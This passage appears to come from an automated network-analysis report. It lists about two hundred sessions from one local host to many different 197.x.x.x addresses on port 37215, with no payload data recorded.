                                                                            20358192.168.2.1536468197.229.216.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20359192.168.2.1542320197.138.76.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20360192.168.2.1552640197.218.74.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20361192.168.2.1541500197.245.58.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20362192.168.2.1559164197.149.64.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20363192.168.2.1535352197.246.74.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20364192.168.2.1560348197.170.208.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20365192.168.2.1559518197.40.114.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20366192.168.2.1543840197.215.255.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20367192.168.2.1554268197.195.147.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20368192.168.2.1560054197.213.220.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20369192.168.2.1533626197.123.0.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20370192.168.2.1556294197.124.8.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20371192.168.2.1539078197.58.4.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20372192.168.2.1560606197.80.151.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20373192.168.2.1553688197.168.14.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20374192.168.2.1532792197.38.66.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20375192.168.2.1554088197.243.55.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20376192.168.2.1560334197.12.40.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20377192.168.2.1537302197.189.2.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20378192.168.2.1534088197.153.5.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20379192.168.2.1547114197.73.254.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20380192.168.2.1547708197.56.18.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20381192.168.2.1557582197.33.194.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20382192.168.2.1543824197.94.61.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20383192.168.2.1546198197.19.132.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20384192.168.2.1558728197.202.140.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20385192.168.2.1554792197.80.30.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20386192.168.2.1556952197.208.162.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20387192.168.2.1560110197.85.126.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20388192.168.2.1557838197.58.156.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20389192.168.2.1533498197.164.65.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20390192.168.2.1533740197.235.31.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20391192.168.2.1547022197.119.111.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20392192.168.2.1559812197.20.15.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20393192.168.2.1546830197.233.171.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20394192.168.2.1557654197.244.2.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20395192.168.2.1536002197.21.29.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20396192.168.2.1544020197.225.47.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20397192.168.2.1548922197.73.225.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20398192.168.2.1554732197.146.6.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20399192.168.2.1543418197.191.142.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20400192.168.2.1546608197.99.168.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20401192.168.2.1559922197.229.18.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20402192.168.2.1557818197.116.92.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20403192.168.2.1545990197.33.118.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20404192.168.2.1548550197.10.248.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20405192.168.2.1560644197.172.73.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20406192.168.2.1537370197.105.2.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20407192.168.2.1532950197.33.142.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20408192.168.2.1548072197.186.219.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20409192.168.2.1549878197.250.79.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20410192.168.2.1539126197.42.121.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20411192.168.2.1542040197.212.132.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20412192.168.2.1533028197.253.5.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20413192.168.2.1540274197.233.16.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20414192.168.2.1536684197.139.142.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20415192.168.2.1544120197.90.3.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20416192.168.2.1546744197.147.184.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20417192.168.2.1551114197.109.254.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20418192.168.2.1533054197.45.3.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20419192.168.2.1538540197.76.23.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20420192.168.2.1533876197.74.81.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20421192.168.2.1553808197.198.69.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20422192.168.2.1548408197.206.204.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20423192.168.2.1553256197.238.121.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20424192.168.2.1549040197.8.48.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20425192.168.2.1536942197.2.92.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20426192.168.2.1540896197.120.231.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20427192.168.2.1556896197.116.246.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20428192.168.2.1548806197.220.101.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20429192.168.2.1548550197.157.10.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20430192.168.2.1557602197.57.222.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20431192.168.2.1541234197.33.213.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20432192.168.2.1545474197.254.221.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20433192.168.2.1549044197.172.188.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20434192.168.2.1540724197.202.167.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20435192.168.2.1551500197.255.140.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20436192.168.2.1537424197.106.251.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20437192.168.2.1533534197.189.86.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20438192.168.2.1557810197.66.151.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20439192.168.2.1537312197.222.213.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20440192.168.2.1553802197.4.31.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20441192.168.2.1545356197.51.57.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20442192.168.2.1533482197.182.191.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20443192.168.2.1560818197.120.145.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20444192.168.2.1557466197.237.16.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20445192.168.2.1558350197.172.230.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20446192.168.2.1558144197.148.2.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20447192.168.2.1558268197.246.181.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20448192.168.2.1533026197.1.80.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20449192.168.2.1534590197.163.34.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20450192.168.2.1541284197.208.7.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20451192.168.2.1549580197.228.216.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20452192.168.2.1541426197.216.7.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20453192.168.2.1559682197.43.60.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20454192.168.2.1547422197.115.218.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20455192.168.2.1556266197.216.170.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20456192.168.2.1557234197.63.200.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20457192.168.2.1557878197.174.204.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20458192.168.2.1537296197.109.11.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20459192.168.2.1553392197.188.1.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20460192.168.2.1553412197.215.206.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20461192.168.2.1556110197.40.81.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20462192.168.2.1545450197.132.73.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20463192.168.2.1549340197.92.245.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20464192.168.2.1540756197.142.32.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20465192.168.2.1541446197.158.100.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20466192.168.2.1549044197.208.240.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20467192.168.2.1542282197.202.103.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20468192.168.2.1541406197.197.158.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20469192.168.2.1544354197.40.152.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20470192.168.2.1549778197.89.131.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20471192.168.2.1542468197.146.9.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20472192.168.2.1536052197.39.209.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20473192.168.2.1541304197.138.133.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20474192.168.2.1534362197.127.225.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20475192.168.2.1541888197.28.41.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20476192.168.2.1550824197.22.201.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20477192.168.2.1542892197.24.223.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20478192.168.2.1560450197.231.138.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20479192.168.2.1533548197.243.43.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20480192.168.2.1558480197.117.124.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20481192.168.2.1547194197.205.98.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20482192.168.2.1533664197.20.182.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20483192.168.2.1554500197.255.176.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20484192.168.2.1553320197.242.5.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20485192.168.2.1551824197.111.51.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20486192.168.2.1558188197.226.27.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20487192.168.2.1551244197.9.239.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20488192.168.2.1537462197.156.196.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20489192.168.2.1540274197.101.253.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20490192.168.2.1545484197.147.195.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20491192.168.2.1560200197.239.19.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20492192.168.2.1558698197.114.222.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20493192.168.2.1545252197.206.193.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20494192.168.2.1544510197.204.205.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20495192.168.2.1542402197.107.106.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20496192.168.2.1551938197.103.15.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20497192.168.2.1544184197.230.227.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20498192.168.2.1544902197.83.214.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20499192.168.2.1554906197.192.229.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20500192.168.2.1553580197.56.19.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20501192.168.2.1553750197.252.190.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20502192.168.2.1552322197.241.164.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20503192.168.2.1535738197.238.175.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20504192.168.2.1559560197.149.137.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20505192.168.2.1559768197.60.179.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20506192.168.2.1534562197.18.89.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20507192.168.2.1557784197.45.236.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20508192.168.2.1546556197.121.123.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20509192.168.2.1559090197.208.12.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20510192.168.2.1558704197.254.7.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20511192.168.2.1552232197.246.40.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20512192.168.2.1533228197.11.241.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20513192.168.2.1540288197.85.168.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20514192.168.2.1538086197.156.125.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20515192.168.2.1560926197.62.95.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20516192.168.2.1540872197.172.32.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20517192.168.2.1543766197.18.248.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20518192.168.2.1553856197.5.219.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20519192.168.2.1550496197.158.71.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20520192.168.2.1549364197.109.105.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20521192.168.2.1534888197.84.2.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20522192.168.2.1553260197.253.20.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20523192.168.2.1556852197.9.224.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20524192.168.2.1544474197.104.239.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20525192.168.2.1535528197.157.63.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20526192.168.2.1542586197.58.103.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20527192.168.2.1547746197.6.206.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20528192.168.2.1552606197.31.206.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20529192.168.2.1558958197.235.246.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20530192.168.2.1558736197.23.212.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20531192.168.2.1538762197.129.8.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20532192.168.2.1542344197.197.150.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20533192.168.2.1536040197.233.253.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20534192.168.2.1557536197.79.188.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20535192.168.2.1544082197.219.210.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20536192.168.2.1544282197.73.55.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20537192.168.2.1555026197.38.197.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20538192.168.2.1553446197.69.36.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20539192.168.2.1543030197.10.188.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20540192.168.2.1543940197.72.44.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20541192.168.2.1555968197.51.7.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20542192.168.2.1535322197.213.160.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20543192.168.2.1556594197.156.117.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20544192.168.2.1556026197.165.22.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20545192.168.2.1537726197.161.189.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20546192.168.2.1534710197.117.173.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20547192.168.2.1540478197.200.1.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20548192.168.2.1551582197.223.231.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20549192.168.2.1536838197.252.6.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20550192.168.2.1555738197.147.131.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20551192.168.2.1535250197.51.79.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20552192.168.2.1555592197.219.90.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20553192.168.2.1544212197.18.119.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20554192.168.2.1534474197.109.218.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20555192.168.2.1536112197.200.73.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20556192.168.2.1544658197.94.244.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20557192.168.2.1545770197.11.249.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
